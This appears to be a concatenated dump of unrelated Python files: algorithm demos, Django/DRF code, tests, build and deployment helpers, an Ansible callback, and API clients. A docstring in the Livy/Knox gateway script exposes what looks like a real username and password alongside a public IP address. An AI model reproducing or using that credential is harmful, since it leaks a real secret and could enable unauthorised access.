        return '[ID: %d, Question: %s, Type: %s, Approach: %s, Tool: %s]' % (self.id, self.question_text, self.type, self.approach, self.tool)
|
# Demonstrate big-O: find the smallest n0 such that
# f(n) = 8n^2 + 3n + 3 <= c * g(n) with g(n) = n^2 for all n >= n0.
print("Your function is 8n^2+3n+3")
print ("g(n) = n^2 ")
print("Assuming c as 9")
n = 0
for i in range(30):
    f_n = 8 * (i ** 2) + 3 * i + 3
    # Bug fix: the script states c = 9 (and tabulates 9*n^2 below) but the
    # original compared against 10*n^2 here; use c = 9 consistently.
    c_g_n = 9 * (i ** 2)
    if (c_g_n >= f_n):
        n = i
        break
print("Value of n0: ", n)
print ("Value\t\tF(n)\t\tc*G(n)")
for i in range(10, 31):
    print(i, "\t\t", 8 * (i ** 2) + 3 * i + 3, "\t\t", 9 * (i ** 2))
import numpy as np
import time
from scipy.cluster.vq import kmeans
nr_total_centers = 200
feature_dimension = 250
def mapper(key, value):
    """Identity mapper: funnel every input line to one shared reducer key.

    key: ignored (None); value: one line of the input file.
    """
    yield ("key", value)
def reducer(key, values):
    # key: key from mapper used to aggregate
    # values: list of all value for that key
    # Note that we do *not* output a (key, value) pair here.
    #
    # Runs a k-means|| style initialization over the shuffled rows to pick
    # up to `nr_total_centers` seed centers, then refines them with scipy's
    # kmeans and yields the resulting codebook.
    # NOTE(review): `values` is assumed to be a 2-D numpy array of shape
    # (n_images, feature_dimension) — confirm against the framework.
    start = time.time()
    np.random.shuffle(values)
    # number of images
    k = values.shape[0]
    # array containing 200 centers for initialization of the result (random)
    result = np.zeros((nr_total_centers,feature_dimension))
    # pick the first center as mean of datapoints
    result[0,:] = np.sum(values,axis=0) / k
    # D holds the distances from datapoints to closest center
    D = np.zeros(k)
    # psi is the sum of distances from the centers (sum of values in D)
    psi = 0
    # counting acquired centers
    r = 1
    # oversampling factor and nr of iterations (we get about l*n centers)
    n = 7
    l = 30
    # start k-means|| (initialization)
    start_barbar = time.time()
    for i in range(n):
        for j in range(k):
            # go through the dataset
            c = np.inf
            # find distance of closest center
            for m in range(r):
                dist = np.linalg.norm(result[m,:] - values[j,:])
                if dist < c:
                    c = dist
            # store closest distance squared
            D[j] = c**2
        psi = np.sum(D)
        # go through the dataset again to sample new centers
        for p in range(k):
            # random value between 0 and 1
            ind = np.random.random_sample()
            # if probability (l*D[p]/psi) is high enough, sample as center
            if ind <= l*D[p]/psi:
                result[r,:] = values[p,:]
                r += 1
            if r == nr_total_centers:
                break
        if r == nr_total_centers:
            break
    end_barbar = time.time()
    print("Initialization done. Time: " + str((end_barbar-start_barbar)/60.0))
    # do kmeans from scipy with initial centers
    final_result = kmeans(values,result)
    # begin online k-means
    # t = 1.0
    # # loop over all images and do online k-means
    # for i in range(k):
    #     # get the next image
    #     temp = values[i,:]
    #     # initialize parameters (min distance and that index)
    #     c = np.inf
    #     min_index = 0
    #     # find index of center which is closest to image
    #     for j in range(nr_total_centers):
    #         dist = np.linalg.norm(result[j,:] - temp)
    #         if dist < c:
    #             c = dist
    #             min_index = j
    #     # weigh higher distances more than lower ones
    #     if c > 10 and i < k*l-6000:
    #         stepsize = 0.9
    #     elif c == 0:
    #         continue
    #     else:
    #         stepsize = 1.0 / t
    #     result[min_index,:] += stepsize*(temp - result[min_index,:])
    #     t += 0.003
    end = time.time()
    print("Reducer time: " + str((end-start)/60.0))
    # scipy's kmeans returns (codebook, distortion); keep the centers only
    yield final_result[0]
|
from rest_framework.serializers import ModelSerializer, raise_errors_on_nested_writes
from django.contrib.auth.models import User
from app.api.employee.serializers import Employee_listSerializer
from app.model import Attendance
from rest_framework import serializers
class AttandanceSerialzier(ModelSerializer):
    """Serializer for Attendance records.

    NOTE(review): `fields = ()` serializes no fields at all — confirm
    whether the field list was meant to be filled in.  (The misspelled
    class name is kept because external code may import it.)
    """
    # employee_id = Employee_listSerializer(read_only=True)
    # employee_id_id = serializers.IntegerField(write_only=True)
    class Meta:
        model = Attendance
        fields = ()
    # def update(self, instance, validated_data):
    #     if instance.
|
import requests
import subprocess
import time, sys
# Interactive setup: payout address and proof-of-work backend selection.
print("Welcome to Distributed Nano Proof of Work System")
address = input("Please enter your payout address: ")
print("All payouts will go to %s" % address)
# 0 = compute PoW locally with the bundled ./mpow binary, 1 = delegate to a node
pow_source = int(input("Select PoW Source, 0 = local, 1 = node: "))
if pow_source > 1:
    print("Incorrect Entry, Exiting")
    sys.exit()
print("Waiting for work...")
# Poll the coordinator forever: fetch a hash, compute/delegate the PoW,
# then post the result back tagged with the payout address.
while 1:
    try:
        r = requests.get('http://178.62.11.37/request_work')
        hash_result = r.json()
        # "error" means no work is currently available
        if hash_result['hash'] != "error":
            if pow_source == 0:
                try:
                    # local PoW via the bundled mpow binary
                    result = subprocess.check_output(["./mpow", hash_result['hash']])
                    work = result.decode().rstrip('\n\r')
                    print(work)
                except:
                    print("Error - no mpow binary")
                    sys.exit()
            elif pow_source == 1:
                try:
                    # delegate PoW generation to a local nano node RPC
                    rai_node_address = 'http://%s:%s' % ('127.0.0.1', '7076')
                    get_work = '{ "action" : "work_generate", "hash" : "%s", "use_peers": "true" }' % hash_result['hash']
                    r = requests.post(rai_node_address, data = get_work)
                    resulting_work = r.json()
                    work = resulting_work['work'].lower()
                except:
                    print("Error - failed to connect to node")
                    sys.exit()
            json_request = '{"hash" : "%s", "work" : "%s", "address" : "%s"}' % (hash_result['hash'], work, address)
            r = requests.post('http://178.62.11.37/return_work', data = json_request)
            print(r.text)
        time.sleep(20)
    except:
        # NOTE(review): this bare except swallows every failure (including
        # KeyboardInterrupt) and just prints "Error" — consider narrowing.
        print("Error")
|
#!/usr/bin/env python3
"""Check that all exported symbols are specified in the symbol version scripts.
If this fails, please update the appropriate .map file (adding new version
nodes as needed).
"""
import os
import pathlib
import re
import sys
# Root of the source tree, supplied by the build system via the environment.
top_srcdir = pathlib.Path(os.environ['top_srcdir'])
def symbols_from_map(path):
    """Return every xkb_* symbol name listed in a version-script .map file."""
    text = path.read_text('utf-8')
    return re.findall(r'^\s+(xkb_.*);', text, re.MULTILINE)
def symbols_from_src(path):
    """Return every xkb_* symbol exported (via XKB_EXPORT) in a C source file."""
    text = path.read_text('utf-8')
    return re.findall(r'XKB_EXPORT.*\n(xkb_.*)\(', text)
def diff(map_path, src_paths):
    """Return (map-only, src-only) sorted lists of symbol names.

    The first list holds symbols declared in the map but not exported by
    any source file; the second holds exports missing from the map.
    """
    map_symbols = set(symbols_from_map(map_path))
    src_symbols = set()
    for path in src_paths:
        src_symbols.update(symbols_from_src(path))
    return sorted(map_symbols - src_symbols), sorted(src_symbols - map_symbols)
# NOTE(review): `exit` shadows the builtin; harmless in this short script,
# but renaming it to `status` would be cleaner.
exit = 0
# xkbcommon symbols: compare the map against all core source directories.
left, right = diff(
    top_srcdir/'xkbcommon.map',
    [
        *(top_srcdir/'src').glob('*.c'),
        *(top_srcdir/'src'/'xkbcomp').glob('*.c'),
        *(top_srcdir/'src'/'compose').glob('*.c'),
    ],
)
# `left` = listed in the map but never exported; `right` = exported but unlisted.
if left:
    print('xkbcommon map has extra symbols:', ' '.join(left))
    exit = 1
if right:
    print('xkbcommon src has extra symbols:', ' '.join(right))
    exit = 1
# xkbcommon-x11 symbols
left, right = diff(
    top_srcdir/'xkbcommon-x11.map',
    [
        *(top_srcdir/'src'/'x11').glob('*.c'),
    ],
)
if left:
    print('xkbcommon-x11 map has extra symbols:', ' '.join(left))
    exit = 1
if right:
    print('xkbcommon-x11 src has extra symbols:', ' '.join(right))
    exit = 1
sys.exit(exit)
|
# Generated by Django 3.1.1 on 2020-11-05 16:31
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the app_version table (auto id plus type/version strings).
    Auto-generated by Django; avoid hand-editing applied migrations.
    """
    dependencies = [
        ('GoodData', '0052_auto_20201102_1732'),
    ]
    operations = [
        migrations.CreateModel(
            name='app_version',
            fields=[
                ('app_version_id', models.AutoField(primary_key=True, serialize=False)),
                ('type', models.CharField(max_length=100)),
                ('version', models.CharField(max_length=100)),
            ],
        ),
    ]
|
#!/home/kevinr/src/750book-web-project/750book-web-env/bin/python2.7
# EASY-INSTALL-ENTRY-SCRIPT: 'celery==2.5.1','console_scripts','camqadm'
# Auto-generated setuptools launcher: resolves the `camqadm` console-script
# entry point pinned to celery 2.5.1 and exits with its return value.
__requires__ = 'celery==2.5.1'
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    sys.exit(
        load_entry_point('celery==2.5.1', 'console_scripts', 'camqadm')()
    )
|
#!/usr/bin/env python
import re
import sys
import DNS
# Python 2 CLI: fetch a twitter user's last status via a DNS TXT lookup
# against the any.io resolver service.
if len(sys.argv) == 1 or sys.argv[1] == "-h":
    print 'Get last status of someone on twitter'
    print "Usage: %s sizeof" % sys.argv[0]
    sys.exit(0)
try:
    # sanitize the handle to alphanumerics (plus * and .) before querying
    username = re.search('[a-zA-Z0-9*.]*', sys.argv[1]).group(0)
    DNS.DiscoverNameServers();
    r = DNS.Request('%s.twitter.any.io' % username, qtype='txt');
    ans = r.req()
    print ans.answers[0]['data'][0]
except Exception as ex:
    print "Humph, I can't find this twitter user ..."
|
# --utf-8--
import unittest
from comment import context
from comment.request_util import Request
from ddt import ddt, data
from datetime import datetime
from testrun import de
from comment.log import get_logger
from comment.every_path import conf_path
from comment.readini import Readini
# Timestamp written back to the workbook alongside each result.
time = datetime.now().strftime('%Y/%m/%d/%H:%M:%S')
# host = "http://120.24.33.253:8080/futureloan/mvc/api/"
cases = de.ReadExcel('充值')  # load the "recharge" test cases from Excel
request = Request()
readini=Readini(conf_path)
host=readini.readini("conf","host")  # base url comes from the ini config
@ddt
class Testlogin(unittest.TestCase):
    # Data-driven recharge test cases; ddt unpacks `cases` and feeds one
    # case per generated test method.
    logger = get_logger("接口测试")
    @data(*cases)
    def testlogin(self, case):
        # Substitute context variables into the raw case, send the request,
        # assert on the response code, and record the outcome in the sheet.
        new_case = context.content(case)
        try:
            # url,method,data=None,content_type=None
            result = request.sendrequest(host + new_case['url'], new_case['method'], new_case['data'])
            self.assertEqual(result['code'], str(new_case['assert']))
            self.logger.info("用例标题:%s 执行通过,%s"%(new_case['title'],result['msg']))
            # print(result)
            de.Write("充值",new_case["id"]+1,None,"Pass",time)
        except Exception as e:
            self.logger.debug("用例标题:%s 执行失败"%new_case['title'])
            # NOTE(review): failures are also recorded with status "Pass" —
            # confirm this should not be "Fail".
            de.Write("充值",new_case["id"]+1,e,"Pass",time)
            raise e
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Andrea Masi 2014 eraclitux@gmail.com
import unittest
import mock
import requests
from ipcampy.common import CamException
from ipcampy.foscam import FosCam, map_position
class TestFosCam(unittest.TestCase):
    """Unit tests for the FosCam driver with all HTTP traffic mocked out."""
    def test_map_position_1(self):
        # logical positions map onto the camera's preset slots (1->31 ... 16->61)
        self.assertEqual(map_position(1), 31)
    def test_map_position_16(self):
        self.assertEqual(map_position(16), 61)
    @mock.patch('ipcampy.foscam.requests')
    def test_move_no_password(self, mock_requests):
        # a 401 from the camera must surface as CamException("Unauthorized...")
        r = requests.Response()
        r.status_code = 401
        mock_requests.get.return_value = r
        f = FosCam("localhost")
        with self.assertRaisesRegexp(CamException, "Unauthorized"):
            f.move(1)
    @mock.patch('ipcampy.foscam.requests')
    def test_move_wrong_pos(self, mock_requests):
        # NOTE(review): assertRaisesRegexp is deprecated (assertRaisesRegex).
        # This expects a "Position" error although the mock returns 401 —
        # presumably argument validation happens before the HTTP call; verify.
        r = requests.Response()
        r.status_code = 401
        mock_requests.get.return_value = r
        f = FosCam("localhost")
        with self.assertRaisesRegexp(CamException, "Position"):
            f.move(18)
if __name__ == '__main__':
    unittest.main()
|
from base_command import base_command
import time
# Registration metadata consumed by the command loader: the id, the voice
# rule patterns (with optional ?(...) words) that trigger this command,
# and per-command variables (none here).
command_info = {
    'id' : 'echo' ,
    'rules' : [ '?(please) start echoing ?(me)' ] ,
    'vars' : None
}
class command(base_command) :
    """Demo command: echoes back every incoming message until "finished"."""
    def __init__(self,opts) :
        # pass on the opts to the base class
        super().__init__(opts)
    # the main run function for the command
    def run(self) :
        self.log.i("Running")
        self.emit("OK")
        while True :
            # wait for next message
            # can write blocking code b/c will be run inside thread
            text = self.get_input()
            # - for getting get chunk
            # text = self.call_command({'args' : {} , 'command_info' : { 'id' : 'get_text_chunk' ,
            #                                     'module' : 'builtins'}})
            #text =self.get_input()
            self.log.i("Received msg: {}".format(text))
            if text == "finished" :
                self.emit("EXITING")
                break
            else :
                self.emit("You said: {}".format(text))
            # throttle the echo loop
            time.sleep(5)
        # at this point we are done
        self.finish("DONE")
|
# Copyright 2017, DELLEMC, Inc.
"""
Module to abstract NPM operation
"""
import json
import sys
import os
try:
    import common
except ImportError as import_err:
    # Python 2 print statement: report the missing helper module and abort.
    print import_err
    sys.exit(1)
class NPM(object):
    """
    A module of NPM: authenticates against a registry with a token and
    wraps `npm version` / `npm publish` for a package directory.
    """
    def __init__(self, registry, token):
        # registry host (no protocol) and the auth token used for publishing
        self._registry = registry
        self._token = token
        self.authenticate()
    def authenticate(self):
        '''
        Authenticate the npm registry with token

        Writes //<registry>/:_authToken=<token> to ~/.npmrc and verifies
        the credentials with `npm whoami`.
        NOTE(review): opening with 'w+' truncates any existing user
        .npmrc — confirm that is intended.
        '''
        try:
            home = os.path.expanduser("~")
            user_config = os.path.join(home,".npmrc")
            f = open(user_config, 'w+')
            text = "//{registry}/:_authToken={token}"\
                .format(registry=self._registry, token=self._token)
            f.write(text)
            f.close()
            cmd_args = ['npm', 'whoami']
            common.run_command(cmd_args)
        except Exception, e:
            raise ValueError("Failed to authenticate with {registry} due to {error}"\
                .format(registry=self._registry, error=e))
    @staticmethod
    def update_version(package_dir, version=None):
        '''
        update version of package via `npm version`, never creating a git tag;
        with no explicit version npm applies its default bump
        '''
        try:
            cmd_args = ["npm", "version", "--no-git-tag-version"]
            if version is not None:
                cmd_args.append(version)
            common.run_command(cmd_args, directory=package_dir)
        except Exception, e:
            raise ValueError("Failed to update version of package {package} due to {error}"\
                .format(package=package_dir, error=e))
    def publish_package(self, package_dir, tag=None):
        '''
        publish package to npm registry, optionally under a dist-tag
        '''
        try:
            cmd_args = ["npm", "publish"]
            if tag is not None:
                cmd_args += ["--tag", tag]
            common.run_command(cmd_args, directory=package_dir)
        except Exception, e:
            raise ValueError("Failed to publish package {package} due to {error}"\
                .format(package=package_dir, error=e))
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
# Wrap splunk-search: append a row limit to the query, execute it via the
# splunkpy brand, and render the results as a markdown table.
query = demisto.args()['query']
rows = demisto.args()['rows']
headers = ""
query = query + ' | head ' + rows
res = demisto.executeCommand('splunk-search', {'using-brand': 'splunkpy', 'query': query})
contents = res[0]['Contents']
if isError(res[0]):
    return_error("Error occured. " + str(contents))
if (res and len(res) > 0 and contents):
    # scalar (non-dict) results get a generic single-column header
    if not isinstance(contents[0], dict):
        headers = "results"
    demisto.results({"Type": 1, "Contents": contents, "ContentsFormat": "json", "EntryContext": {},
                     "HumanReadable": tableToMarkdown("Splunk Search results for: " + query, contents, headers)})
else:
    demisto.results('No results.')
|
import numpy as np
def aux(x):
    """Polynomial smoothing step 35x^4 - 84x^5 + 70x^6 - 20x^7, masked so the
    result is zero outside [0, 1]. Works on scalars and numpy arrays."""
    poly = np.poly1d([-20, 70, -84, 35, 0, 0, 0, 0])
    inside = (x >= 0) * (x <= 1)
    return poly(x) * inside
def mother(x):
    """Meyer-type mother wavelet evaluated on |x|: a sine transition on
    (pi/4, pi/2], a cosine transition on (pi/2, pi], zero elsewhere."""
    x = np.abs(x)
    band1 = (x > np.pi/4) & (x <= np.pi/2)
    band2 = (x > np.pi/2) & (x <= np.pi)
    part1 = band1 * np.sin(np.pi/2 * aux(4*x/np.pi - 1))
    part2 = band2 * np.cos(np.pi/2 * aux(2*x/np.pi - 1))
    return part1 + part2
def scaling(x):
    """Meyer-type scaling function on |x|: 1 on [0, pi/4], a cosine
    roll-off on (pi/4, pi/2], and 0 beyond.

    Fixes relative to the original:
    - accepts plain scalars as well as arrays (np.ones(len(x)) required a
      sized input);
    - the flat band now includes x == pi/4: both one-sided limits there
      are 1 (cos(pi/2 * aux(0)) == 1), so the old strict '<' left a
      spurious zero exactly at the boundary.
    """
    x = np.abs(x)
    low = x <= np.pi/4
    mid = (x > np.pi/4) & (x <= np.pi/2)
    return low * 1.0 + mid * np.cos(np.pi/2 * aux(4*x/np.pi - 1))
|
from ..algo import Algo
from .. import tools
import numpy as np
import pandas as pd
from numpy import matrix
from cvxopt import solvers, matrix
solvers.options['show_progress'] = False
class CORN(Algo):
    """
    Correlation-driven nonparametric learning approach. Similar to anticor but instead
    of distance of return vectors they use correlation.
    In appendix of the article, universal property is proven.

    Two versions are available. Fast which provides around 2x speedup, but uses more memory
    (linear in window) and slow version which is memory efficient. Most efficient would
    be to rewrite it in sweave or numba.

    NOTE(review): this implementation uses DataFrame.ix, which was removed
    in pandas 1.0 — it requires an old pandas or porting to .loc/.iloc.

    Reference:
        B. Li, S. C. H. Hoi, and V. Gopalkrishnan.
        Corn: correlation-driven nonparametric learning approach for portfolio selection, 2011.
        http://www.cais.ntu.edu.sg/~chhoi/paper_pdf/TIST-CORN.pdf
    """
    PRICE_TYPE = 'ratio'
    REPLACE_MISSING = True
    def __init__(self, window=5, rho=0.1, fast_version=True):
        """
        :param window: Window parameter.
        :param rho: Correlation coefficient threshold. Recommended is 0.
        :param fast_version: If true, use fast version which provides around 2x speedup, but uses
                             more memory.
        """
        # input check
        if not(-1 <= rho <= 1):
            raise ValueError('rho must be between -1 and 1')
        if not(window >= 2):
            raise ValueError('window must be greater than 2')
        super(CORN, self).__init__()
        self.window = window
        self.rho = rho
        self.fast_version = fast_version
        # assign step method dynamically
        self.step = self.step_fast if self.fast_version else self.step_slow
    def init_weights(self, m):
        # start from the uniform portfolio over m assets
        return np.ones(m) / m
    def init_step(self, X):
        if self.fast_version:
            # redefine index to enumerate
            X.index = range(len(X))
            # X_flat row t holds the `window` most recent price-ratio rows
            # ending at t, laid side by side via shifted copies
            foo = [X.shift(i) for i in range(self.window)]
            self.X_flat = pd.concat(foo, axis=1)
            self.X = X
            self.t = -1
    def step_slow(self, x, last_b, history):
        # NOTE: the slow variant receives `history`; step_fast does not —
        # the framework calls whichever was bound to self.step in __init__.
        if len(history) <= self.window:
            return last_b
        else:
            # init
            window = self.window
            indices = []
            m = len(x)
            # calculate correlation with predecesors
            X_t = history.iloc[-window:].values.flatten()
            for i in range(window, len(history)):
                X_i = history.ix[i-window:i-1].values.flatten()
                if np.corrcoef(X_t, X_i)[0,1] >= self.rho:
                    indices.append(i)
            # calculate optimal portfolio over the rows that followed
            # sufficiently correlated windows
            C = history.ix[indices, :]
            if C.shape[0] == 0:
                # no similar windows found -> fall back to uniform weights
                b = np.ones(m) / float(m)
            else:
                b = self.optimal_weights(C)
            return b
    def step_fast(self, x, last_b):
        # iterate time
        self.t += 1
        if self.t < self.window:
            return last_b
        else:
            # init
            window = self.window
            m = len(x)
            X_t = self.X_flat.ix[self.t]
            X_i = self.X_flat.iloc[window-1 : self.t]
            # correlation of every complete historical window with the current one
            c = X_i.apply(lambda r: np.corrcoef(r.values, X_t.values)[0,1], axis=1)
            # rows immediately following the correlated windows
            C = self.X.ix[c.index[c >= self.rho] + 1]
            if C.shape[0] == 0:
                b = np.ones(m) / float(m)
            else:
                b = self.optimal_weights(C)
            return b
    def optimal_weights(self, X):
        # quadratic program over the simplex: weights constrained to
        # b >= 0 and sum(b) == 1, solved with cvxopt
        X = np.mat(X)
        n,m = X.shape
        P = 2 * matrix(X.T * X)
        q = -3 * matrix(np.ones((1,n)) * X).T
        G = matrix(-np.eye(m))
        h = matrix(np.zeros(m))
        A = matrix(np.ones(m)).T
        b = matrix(1.)
        sol = solvers.qp(P, q, G, h, A, b)
        return np.squeeze(sol['x'])
# use case
if __name__ == '__main__':
    # Run the algorithm on the library's bundled sample data.
    tools.quickrun(CORN())
|
#!/usr/bin/python
# coding: utf-8
# Copyright 2018 AstroLab Software
# Author: Chris Arnault
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
curl -i -k -u toto:tata -X POST --data '{"kind": "pyspark"}' -H 'Content-Type: application/json' https://134.158.75.56:8443/gateway/sandbox/livy/v1/sessions
curl -i -k -u christian.arnault:@@@DTsa57 -X GET --data '{"kind": "pyspark"}' -H 'Content-Type: application/json' https://134.158.75.109:8443/gateway/knox_spark/livy/v1/version
"""
import netrc
import base64
import os
import requests
import json
# Machine-specific: force HOME so netrc resolves c:/arnault/.netrc on Windows.
os.environ['HOME'] = 'c:/arnault'
def main():
    """Query the Livy /version endpoint through the Knox gateway, using
    credentials looked up in ~/.netrc under the `gateway_spark` machine."""
    print('auth')
    gateway_name = "gateway_spark"
    host = "134.158.75.109"
    port = 8443
    gateway = "gateway/knox_spark"
    secrets = netrc.netrc()
    login, username, password = secrets.authenticators(gateway_name)
    """
    a = '{}:{}'.format(login, password).encode('utf-8')
    a = base64.b64encode(a)
    auth = u'Basic {}'.format(a)
    print(auth)
    ### 'Authorization': auth
    """
    # , 'Authorization': auth
    headers = {'Content-Type': 'application/json'}
    data = {"kind": "pyspark"}
    url = 'https://{}:{}/{}/livy/v1/version'.format(host, port, gateway)
    # verify=False because the gateway presents a self-signed certificate
    r = requests.get(url, auth=(login, password), headers=headers, data=json.dumps(data), verify=False)
    print(r.json())
if __name__ == "__main__":
    main()
|
import unittest
import main
class FlaskTestCase(unittest.TestCase):
    """Post a memo to the Flask app and check it is echoed in the page."""
    def setUp(self):
        # Exercise the endpoint once; the lower-cased response HTML is
        # shared with the assertion below.
        main.app.testing = True
        client = main.app.test_client()
        rv = client.post('/', data=dict(memo='テスト'))
        self.html = rv.data.decode('utf-8').lower()
    def test_result(self):
        self.assertTrue('テスト' in self.html, msg='メモが正しく書き込まれていません')
|
import requests
import matplotlib.pyplot as plt
import json
import pandas
# Jaeger HTTP API endpoint for the demo cluster's frontend service.
# Bug fix: `domain` used to end in '/', producing a double slash
# ("http://host//api/traces") in the request url.
domain = "104.196.179.170"
address = f'http://{domain}/api/traces'
# Jaeger operation name -> filename stem used for the dumped data files.
operations = {
    "Recv./": "recv_home_page",
    "Recv./cart": "recv_cart",
    "Recv./cart/checkout": "recv_cart_checkout",
    "Recv./product/0PUK6V6EV0": "recv_product_0PUK6V6EV0",
    "Recv./setCurrency": "recv_setCurrency",
    "Recv./product/L9ECAV7KIM": "recv_product_L9ECAV7KIM",
}
def get_all(operation_name):
    """Fetch up to 1000 recent traces for one frontend operation from the
    Jaeger API, dump the raw JSON, and save/print a summary of the root-span
    durations.

    :param operation_name: a key of the `operations` mapping
    """
    filename = operations[operation_name]
    payload = {"limit": 1000, "lookback": "1h", "operation": operation_name, "service": "frontend"}
    results = requests.get(address, params=payload).json()
    # Bug fix: `filename` was computed but never interpolated into the
    # output paths, so every operation overwrote the same files.
    with open(f'data/full_trace_{filename}.json', 'w', encoding='utf-8') as f:
        json.dump(results, f, ensure_ascii=False, indent=4)
    # One duration per trace: the span with no references is the root.
    # Jaeger reports durations in microseconds; /1000 converts to ms.
    lengths = [[r["duration"] / 1000 for r in result["spans"] if len(r["references"]) == 0][0]
               for result in results["data"]]
    series = pandas.Series(lengths)
    print(filename)
    print(series.describe())
    series.to_csv(f"data/durations_recorded_by_jaegar_{filename}.csv")
# Pull, dump and summarise the traces for every configured operation.
for operation in operations:
    get_all(operation)
from __future__ import absolute_import, division, print_function
import os
import atexit
from ansible.plugins.callback import CallbackBase
# debconf template used for the progress/info display during the run
RUNNING_TEMPLATE = "run-ansible/progress/info/running"
class CallbackModule(CallbackBase):
    """Ansible callback that drives a debconf progress bar.

    When Ansible runs under a debconf "passthrough" frontend, this plugin
    speaks the debconf protocol over the inherited DEBCONF_READFD /
    DEBCONF_WRITEFD descriptors, advancing a progress bar as plays and
    tasks start.  Outside that environment it stays disabled and only logs.
    """

    CALLBACK_VERSION = 2.0
    CALLBACK_TYPE = 'shrug'
    CALLBACK_NAME = 'debconf'

    def __init__(self):
        self._enabled = False
        self._progress_started = False
        # This is nasty: there is no reliable "playbook finished" hook here,
        # so close the progress bar at interpreter exit instead.
        atexit.register(self._stop_progress_if_started)
        super(CallbackModule, self).__init__()
        if os.environ.get("DEBIAN_FRONTEND") == "passthrough":
            try:
                readfd = int(os.environ["DEBCONF_READFD"])
                # dup() so closing our file object cannot pull the original
                # descriptor out from under debconf.
                self._debconf_in = os.fdopen(os.dup(readfd), 'r')
                writefd = int(os.environ["DEBCONF_WRITEFD"])
                self._debconf_out = os.fdopen(writefd, 'w')
            except Exception as e:
                self._display.vvvv("failed to fdopen debconf fd: {}".format(e))
            else:
                self._enabled = True
                self._display.vvvv("opened debconf fds")
        else:
            self._display.vvvv(
                "debconf callbacks disabled: DEBIAN_FRONTEND<>passthrough")
        # Might confuse child processes
        for env in ["DEBCONF_OLD_FD_BASE", "DEBCONF_REDIR", "DEBCONF_READFD",
                    "DEBCONF_WRITEFD", "DEBIAN_FRONTEND",
                    "DEBIAN_HAS_FRONTEND"]:
            try:
                del os.environ[env]
            except KeyError:
                # was a bare except; del os.environ[...] only raises KeyError
                pass

    def _communicate(self, line):
        """Send one protocol line to debconf and read the one-line reply."""
        if self._enabled:
            self._display.vvvv("debconf_out: {}".format(line))
            self._debconf_out.write(line + "\n")
            self._debconf_out.flush()
            reply = self._debconf_in.readline()
            self._display.vvvv("debconf_in: {}".format(reply))
        else:
            self._display.vvvv("debconf disabled: {}".format(line))

    def _subst(self, thing_type, thing):
        """Substitute THINGTYPE/THINGNAME into the running template."""
        # Collapse internal whitespace in the task/play name to one space.
        thing_name = " ".join(thing.get_name().strip().split())
        self._communicate("SUBST {} THINGTYPE {}".format(RUNNING_TEMPLATE, thing_type))
        self._communicate("SUBST {} THINGNAME {}".format(RUNNING_TEMPLATE, thing_name))

    def _start_progress(self, thing_type_for_title, thing_for_title, total):
        """Open a debconf progress bar spanning ``total`` steps."""
        self._progress_current = 0
        self._progress_total = total
        self._subst(thing_type_for_title, thing_for_title)
        self._communicate("PROGRESS START 0 {} {}".format(total, RUNNING_TEMPLATE))
        self._progress_started = True

    def _set_progress_info(self, thing_type, thing):
        """Update the info line shown under the progress bar."""
        self._subst(thing_type, thing)
        self._communicate("PROGRESS INFO {}".format(RUNNING_TEMPLATE))

    def _step_progress_bar(self):
        """Advance the bar one step, never past the declared total."""
        if self._progress_current < self._progress_total:
            self._progress_current += 1
            self._communicate("PROGRESS SET {}".format(self._progress_current))

    def _stop_progress_if_started(self):
        """Close the progress bar exactly once (also called via atexit)."""
        if self._progress_started:
            self._communicate("PROGRESS STOP")
            self._progress_started = False

    def v2_playbook_on_play_start(self, play):
        # This is an approximation, because of conditional tasks; rescue/always, etc.
        # It works well enough.
        def count_tasks(things):
            # Recursively count leaf tasks inside block/always containers.
            res = 0
            for thing in things:
                did_recurse = False
                for recursion in ("block", "always"):
                    inner = getattr(thing, recursion, None)
                    if inner:
                        res += count_tasks(inner)
                        did_recurse = True
                if not did_recurse:
                    res += 1
            return res
        self._stop_progress_if_started()
        self._start_progress("play", play, count_tasks(play.compile()))

    def v2_playbook_on_task_start(self, task, is_conditional):
        self._set_progress_info("task", task)
        self._step_progress_bar()

    def v2_playbook_on_cleanup_task_start(self, task):
        self._set_progress_info("cleanup-task", task)

    def v2_playbook_on_handler_task_start(self, task):
        self._set_progress_info("handler", task)
|
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.authtoken.models import Token
from rest_framework.views import APIView
from accounts.api.serializers import RegistrationSerializer
@api_view(['POST',])
def registration_view(request):
    """Register a new account from the POSTed payload.

    On success the response echoes the new account's id/email/username;
    on failure it carries the first relevant validation message.
    """
    if request.method == 'POST':
        serializer = RegistrationSerializer(data=request.data)
        data = {}
        if serializer.is_valid():
            account = serializer.save()
            data['id'] = account.id
            data['response'] = 'successfully registered a new user.'
            data['email'] = account.email
            data['username'] = account.username
            data['status'] = 'success'
        else:
            # Surface only the first error, checked in priority order.
            for field in ('email', 'username', 'password'):
                if field in serializer.errors:
                    data['message'] = serializer.errors[field][0].capitalize()
                    break
            data['status'] = 'failed'
        return Response(data)
class loginView(ObtainAuthToken):
    """Token login endpoint: validates credentials and returns the token
    together with basic profile fields."""

    def post(self, request, *args, **kwargs):
        serializer = self.serializer_class(data=request.data,
                                           context={'request': request})
        serializer.is_valid(raise_exception=True)
        user = serializer.validated_data['user']
        token, _ = Token.objects.get_or_create(user=user)
        payload = {
            'token': token.key,
            'id': user.pk,
            'username': user.username,
            'email': user.email,
        }
        return Response(payload)
class logoutView(APIView):
    """Log the caller out by deleting the token named in the Authorization
    header.

    Always answers 200 so logout is idempotent: a missing, malformed or
    unknown token is treated as already logged out.
    """

    def post(self, request, format=None):
        try:
            authorization = request.META.get('HTTP_AUTHORIZATION')
            # Header shape is "Token <key>"; split()[1] is the key itself.
            token = authorization.split()[1]
            user = Token.objects.get(key=token).user
            # delete the token
            user.auth_token.delete()
        except (AttributeError, IndexError, Token.DoesNotExist):
            # was a bare except; narrowed to: header absent (None.split),
            # header malformed, or token not found in the database
            pass
        return Response({"message":"logged out successfully", "status":status.HTTP_200_OK})
